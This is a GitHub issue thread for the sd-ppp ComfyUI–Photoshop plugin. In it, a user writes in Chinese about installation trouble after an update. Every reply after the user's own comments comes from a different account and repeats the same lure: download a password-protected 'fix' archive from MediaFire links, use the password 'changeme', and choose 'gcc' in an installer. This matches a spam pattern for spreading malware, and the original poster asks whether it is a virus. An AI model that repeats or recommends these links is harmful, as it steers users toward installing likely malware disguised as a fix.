### ISSUE TITLE
很久没更新了，发现大变样

### ISSUE THREAD

**Issue by kerker93** [zombieyang/sd-ppp#36]
很久没更新了，发现结点大变样，需要新的用法引导了的感觉。comfyui 的界面变了，找不到以前下载插件地方，所以复制了dist文件夹下的所有文件覆盖了ps插件文件夹，不知道这样是不是造成节点差异的原因。这样的安装后发现ps插件能显示绿色已链接，但是并不能显示目前可用的网页链接，同时网页里的comfyui也识别不到ps里面的文件夹

**Comment by kerker93** [comment]
把所有节点检查了下 发现这样覆盖插件安装应该不太对，好像少了send image to photoshop 等节点，所以导致突然不会用了。所以可能还是我安装错了。不过不知道如何正确安装，因为有老版插件的 他似乎不会跳下载按钮，设置里又因为comfy版本变更找不到下载了

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kerker93** [comment]
> Download 下载下载 下载 https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme 密码：changeme In the installer menu, select "gcc."在安装程序菜单中，选择“gcc”。

啥玩意 不会有毒吧

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
